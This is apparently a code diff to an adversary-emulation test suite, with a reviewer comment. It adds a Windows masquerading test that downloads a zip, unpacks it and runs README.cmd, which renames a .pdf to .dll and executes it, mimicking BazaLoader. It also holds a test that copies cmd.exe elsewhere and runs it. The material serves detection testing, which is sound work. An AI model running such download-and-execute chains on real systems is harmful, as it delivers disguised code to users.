diff --git a/atomics/T1036/T1036.yaml b/atomics/T1036/T1036.yaml
index 8f9029d1..b089475f 100644
--- a/atomics/T1036/T1036.yaml
+++ b/atomics/T1036/T1036.yaml
@@ -2,7 +2,7 @@ attack_technique: T1036
 display_name: "Masquerading"
 atomic_tests:
 - name: System File Copied to Unusual Location
- auto_generated_guid: 51005ac7-52e2-45e0-bdab-d17c6d4916cd
+ auto_generated_guid: 51005ac7-52e2-45e0-bdab-d17c6d4916cd
 description: It may be suspicious seeing a file copy of an EXE in System32 or SysWOW64 to a non-system directory or executing from a non-system directory.
 supported_platforms:
 - windows
@@ -11,4 +11,28 @@ atomic_tests:
 copy %WINDIR%\System32\cmd.exe /Y %ALLUSERSPROFILE%\cmd.exe
 start %ALLUSERSPROFILE%\cmd.exe
 cleanup_command: del %ALLUSERSPROFILE%\cmd.exe >nul 2>&1
- name: command_prompt
\ No newline at end of file
+ name: command_prompt
+- name: Malware Masquerading and Execution from Zip File
+ description: When the file is unzipped and the README.cmd file opened, it executes and changes the .pdf to .dll and executes the dll. This is a BazaLoader technique [as reported here](https://twitter.com/ffforward/status/1481672378639912960)
+ supported_platforms:
+ - windows
+ input_arguments:
+ url:
+ description: Location of zip file
+ type: Url
+ default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1036/bin/T1036.zip
+ dependencies:
+ - description: Zip file must be present.
+ prereq_command: |
+ if (Test-Path $env:userprofile\Downloads\T1036.zip) {exit 0} else {exit 1}
+ get_prereq_command: |
+ Invoke-WebRequest -OutFile "$env:userprofile\Downloads\T1036.zip" #{url}
+ executor:
+ command: |-
+ Expand-Archive -Path $env:userprofile\Downloads\T1036.zip -DestinationPath $env:userprofile\Downloads\T1036 -Force
+ cd $env:userprofile\Downloads\T1036
+ cmd /c $env:userprofile\Downloads\T1036\README.cmd >$null 2>$null
+ cleanup_command: |-
+ taskkill /IM Calculator.exe /f >$null 2>$null
+ Remove-Item $env:userprofile\Downloads\T1036 -recurse -ErrorAction Ignore
+ name: powershell
diff --git a/atomics/T1036/bin/T1036.zip b/atomics/T1036/bin/T1036.zip
new file mode 100644
index 00000000..878c01bf
Binary files /dev/null and b/atomics/T1036/bin/T1036.zip differ
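Review bot: The new test's `get_prereq_command` fetches T1036.zip with Invoke-WebRequest and the executor then unpacks it and runs README.cmd from it, but nothing verifies the archive before execution; since the zip is committed in this same change, the prereq can pin it, e.g. `if ((Test-Path $env:userprofile\Downloads\T1036.zip) -and ((Get-FileHash $env:userprofile\Downloads\T1036.zip -Algorithm SHA256).Hash -eq "<EXPECTED_SHA256_OF_T1036.zip>")) {exit 0} else {exit 1}`. The description says the script renames a .pdf to .dll and executes the dll, yet the cleanup runs `taskkill /IM Calculator.exe`, so the description should state what the dll launches (presumably a calculator process) so the cleanup step is traceable. The cleanup removes the extracted T1036 directory but leaves the downloaded T1036.zip in Downloads; if that is not intended as a cache for re-runs, add `Remove-Item $env:userprofile\Downloads\T1036.zip -ErrorAction Ignore`. The sibling test above carries an `auto_generated_guid` while this one has none; if the repository's tooling does not add it automatically, one should be included.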